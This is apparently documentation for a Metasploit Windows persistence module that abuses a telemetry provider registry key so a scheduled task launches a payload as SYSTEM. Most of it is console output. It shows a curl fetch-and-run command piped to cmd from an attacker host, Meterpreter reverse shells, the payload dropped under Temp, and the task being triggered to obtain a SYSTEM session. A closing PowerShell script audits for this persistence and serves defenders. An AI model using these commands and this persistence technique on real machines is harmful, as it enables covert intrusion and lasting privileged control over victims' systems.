## Vulnerable Application

This persistence mechanism installs a new telemetry provider for Windows. If telemetry is turned on, the scheduled task that collects telemetry launches the registered provider, which in turn runs our payload with SYSTEM permissions.

## Verification Steps

1. Start msfconsole
2. Get an admin level shell on Windows
3. Do: `use exploit/windows/persistence/telemetry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when the scheduled task runs.

## Options

### PAYLOAD_NAME

Name of payload file to write. Random string as default.

### NAME

Name of the telemetry program. Random string as default.

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

Get an admin level shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```

Install persistence

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set session 1
session => 1
msf exploit(windows/persistence/telemetry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/telemetry) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Appraiser name found: Microsoft Compatibility Appraiser
[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
[+] The target is vulnerable. Registry writable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
[*] Using telemetry id: uYmoknDG
[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user) or wait till 1/4/2026 4:10:25 AM (SYSTEM)
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
```

Trigger the scheduled task instead of waiting

```
msf exploit(windows/persistence/telemetry) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2344 created.
Channel 4 created.
Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".

C:\WINDOWS\system32>exit
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/telemetry) > date
[*] exec: date

Sat Jan  3 01:30:05 PM EST 2026
msf exploit(windows/persistence/telemetry) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500
msf exploit(windows/persistence/telemetry) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.4444 -> 2.2.2.2:50305 (2.2.2.2)
```
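The registry key and scheduled task shown in the output above are what a defender would audit after such an install. The following PowerShell is an added example, not part of the Metasploit module or its documentation: it enumerates the provider subkeys under `TelemetryController`, flags any provider whose command references an executable outside the Windows or Program Files directories (a heuristic chosen here, not something the page states), and reports when the Compatibility Appraiser task will next run. Value names inside a provider subkey are not documented on this page, so the script inspects every string value rather than assuming one.

```powershell
# Added audit example; not the module's own code. Run from an elevated PowerShell.
$base    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController'
# Assumed "expected" locations for legitimate providers (heuristic, not from the page)
$trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")

function Test-TrustedPath([string]$path) {
    foreach ($prefix in $trusted) {
        if ($path.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$findings = @()
foreach ($key in Get-ChildItem -Path $base -ErrorAction SilentlyContinue) {
    $props = Get-ItemProperty -Path $key.PSPath
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }          # skip provider metadata (PSPath, PSParentPath, ...)
        $data = [string]$p.Value
        if ($data -notmatch '\.exe') { continue }       # only values that reference an executable
        # Strip a leading quote and anything after the .exe (arguments) to get the image path
        $exe = ($data -replace '^"', '') -replace '(?i)(\.exe).*$', '$1'
        $findings += [pscustomobject]@{
            Provider   = $key.PSChildName
            Value      = $p.Name
            Executable = $exe
            Suspicious = -not (Test-TrustedPath $exe)   # e.g. a payload dropped under %TEMP%
        }
    }
}
$findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize

# The page's module relies on this task launching providers as SYSTEM; show when it fires next.
$task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\Application Experience\' `
                          -TaskName 'Microsoft Compatibility Appraiser' -ErrorAction SilentlyContinue
if ($task) { $task | Get-ScheduledTaskInfo | Select-Object TaskName, LastRunTime, NextRunTime }
```

A provider subkey with a random-looking name and an executable under a user's `AppData\Local\Temp` directory, as in the output above, is the pattern this audit is meant to surface.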